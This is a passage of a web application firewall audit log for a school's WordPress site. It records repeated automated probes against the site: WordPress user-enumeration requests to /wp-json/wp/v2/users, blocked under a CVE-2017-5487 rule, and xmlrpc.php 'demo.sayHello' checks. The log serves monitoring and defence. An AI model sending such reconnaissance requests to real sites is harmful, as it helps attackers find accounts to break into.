(phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825523914057 3142 (- - -) Stopwatch2: 1746825523914057 3142; combined=1385, p1=501, p2=854, p3=0, p4=0, p5=29, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --177e952d-Z-- --ee458922-A-- [10/May/2025:04:18:50 +0700] aB5xOquC4AqLGUOyzyX3KwAAAJA 103.236.140.4 35366 103.236.140.4 8181 --ee458922-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ee458922-C-- demo.sayHello --ee458922-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee458922-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825530650473 5841 (- - -) Stopwatch2: 1746825530650473 5841; combined=4289, p1=577, p2=3482, p3=29, p4=31, p5=99, sr=115, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee458922-Z-- --4bef5e39-A-- [10/May/2025:04:19:31 +0700] aB5xY6uC4AqLGUOyzyX3LQAAAJQ 103.236.140.4 35374 103.236.140.4 8181 --4bef5e39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.180 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4bef5e39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bef5e39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825571313523 3547 (- - -) Stopwatch2: 1746825571313523 3547; combined=1538, p1=542, p2=964, p3=0, p4=0, p5=32, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bef5e39-Z-- --07b0f467-A-- [10/May/2025:04:19:37 +0700] aB5xaci6w7GTj2w44Z6XhgAAAMk 103.236.140.4 35378 103.236.140.4 8181 --07b0f467-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --07b0f467-C-- demo.sayHello --07b0f467-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --07b0f467-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825577668687 5597 (- - -) Stopwatch2: 1746825577668687 5597; combined=4133, p1=557, p2=3337, p3=23, p4=27, p5=108, sr=111, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07b0f467-Z-- --6ef26958-A-- [10/May/2025:04:20:13 +0700] aB5xjdr9PbfRBMhzxmRU9QAAAEY 103.236.140.4 35382 103.236.140.4 8181 --6ef26958-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6ef26958-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ef26958-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825613248085 3591 (- - -) Stopwatch2: 1746825613248085 3591; combined=1597, p1=552, p2=1013, p3=0, p4=0, p5=32, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ef26958-Z-- --27670560-A-- [10/May/2025:04:20:19 +0700] aB5xk9r9PbfRBMhzxmRU9wAAAEg 103.236.140.4 35386 103.236.140.4 8181 --27670560-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --27670560-C-- demo.sayHello --27670560-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --27670560-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825619414709 5214 (- - -) Stopwatch2: 1746825619414709 5214; combined=4019, p1=522, p2=3278, p3=23, p4=26, p5=98, sr=108, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27670560-Z-- --5febcd4e-A-- [10/May/2025:04:21:14 +0700] aB5xytr9PbfRBMhzxmRU-QAAAEk 103.236.140.4 35390 103.236.140.4 8181 --5febcd4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5febcd4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5febcd4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825674550627 3597 (- - -) Stopwatch2: 1746825674550627 3597; combined=1566, p1=556, p2=969, p3=0, p4=0, p5=40, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5febcd4e-Z-- --a877fa5b-A-- [10/May/2025:04:21:15 +0700] aB5xy9r9PbfRBMhzxmRU-gAAAEw 103.236.140.4 35392 103.236.140.4 8181 --a877fa5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a877fa5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a877fa5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825675675632 2175 (- - -) Stopwatch2: 1746825675675632 2175; combined=1043, p1=377, p2=640, p3=0, p4=0, p5=26, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a877fa5b-Z-- --18fadc60-A-- [10/May/2025:04:21:21 +0700] aB5x0dr9PbfRBMhzxmRU_QAAAE8 103.236.140.4 35398 103.236.140.4 8181 --18fadc60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.178 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --18fadc60-C-- demo.sayHello --18fadc60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --18fadc60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825681712311 6963 (- - -) Stopwatch2: 1746825681712311 6963; combined=4950, p1=640, p2=4050, p3=37, p4=42, p5=106, sr=121, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18fadc60-Z-- --cfff3930-A-- [10/May/2025:04:21:22 +0700] aB5x0quC4AqLGUOyzyX3LwAAAJY 103.236.140.4 35400 103.236.140.4 8181 --cfff3930-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cfff3930-C-- demo.sayHello --cfff3930-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfff3930-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825682298899 5088 (- - -) Stopwatch2: 1746825682298899 5088; combined=3889, p1=520, p2=3163, p3=22, p4=24, p5=93, sr=116, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfff3930-Z-- --449b1c1a-A-- [10/May/2025:04:21:23 +0700] aB5x09r9PbfRBMhzxmRU_gAAAFI 103.236.140.4 35402 103.236.140.4 8181 --449b1c1a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --449b1c1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --449b1c1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825683556270 2428 (- - -) Stopwatch2: 1746825683556270 2428; combined=1132, p1=387, p2=719, p3=0, p4=0, p5=26, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --449b1c1a-Z-- --f4466d68-A-- [10/May/2025:04:21:28 +0700] aB5x2Nr9PbfRBMhzxmRVAQAAAFQ 103.236.140.4 35410 103.236.140.4 8181 --f4466d68-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.59.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.59.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f4466d68-C-- demo.sayHello --f4466d68-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4466d68-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825688916448 4954 (- - -) Stopwatch2: 1746825688916448 4954; combined=3778, p1=481, p2=3084, p3=23, p4=26, p5=95, sr=110, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4466d68-Z-- --8cceaf65-A-- [10/May/2025:04:22:55 +0700] aB5yL9r9PbfRBMhzxmRVBgAAAEE 103.236.140.4 35422 103.236.140.4 8181 --8cceaf65-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.14.233.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.14.233.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8cceaf65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cceaf65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825775708392 3410 (- - -) Stopwatch2: 1746825775708392 3410; combined=1448, p1=461, p2=956, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cceaf65-Z-- --b2fbe275-A-- [10/May/2025:04:24:29 +0700] aB5yjauC4AqLGUOyzyX3MQAAAJg 103.236.140.4 35430 103.236.140.4 8181 --b2fbe275-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2fbe275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2fbe275-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746825869983638 2857 (- - -) Stopwatch2: 1746825869983638 2857; combined=1548, p1=500, p2=1017, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2fbe275-Z-- --39da9327-A-- [10/May/2025:04:24:36 +0700] aB5ylMi6w7GTj2w44Z6XhwAAAMg 103.236.140.4 35434 103.236.140.4 8181 --39da9327-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --39da9327-C-- demo.sayHello --39da9327-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --39da9327-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746825876226117 6211 (- - -) Stopwatch2: 1746825876226117 6211; combined=4501, p1=604, p2=3640, p3=31, p4=35, p5=110, sr=114, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39da9327-Z-- --c87c9c24-A-- [10/May/2025:04:40:55 +0700] aB52Z9r9PbfRBMhzxmRVGgAAAE8 103.236.140.4 35512 103.236.140.4 8181 --c87c9c24-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.46.24.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.46.24.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c87c9c24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c87c9c24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746826855626382 2375 (- - -) Stopwatch2: 1746826855626382 2375; combined=1125, p1=351, p2=746, p3=0, p4=0, p5=27, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c87c9c24-Z-- --82834415-A-- [10/May/2025:04:44:48 +0700] aB53UNr9PbfRBMhzxmRVIAAAAFc 103.236.140.4 35560 103.236.140.4 8181 --82834415-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --82834415-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82834415-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746827088557636 3451 (- - -) Stopwatch2: 1746827088557636 3451; combined=1450, p1=472, p2=947, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82834415-Z-- --49999413-A-- [10/May/2025:04:44:53 +0700] aB53Vdr9PbfRBMhzxmRVIQAAAEA 103.236.140.4 35564 103.236.140.4 8181 --49999413-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 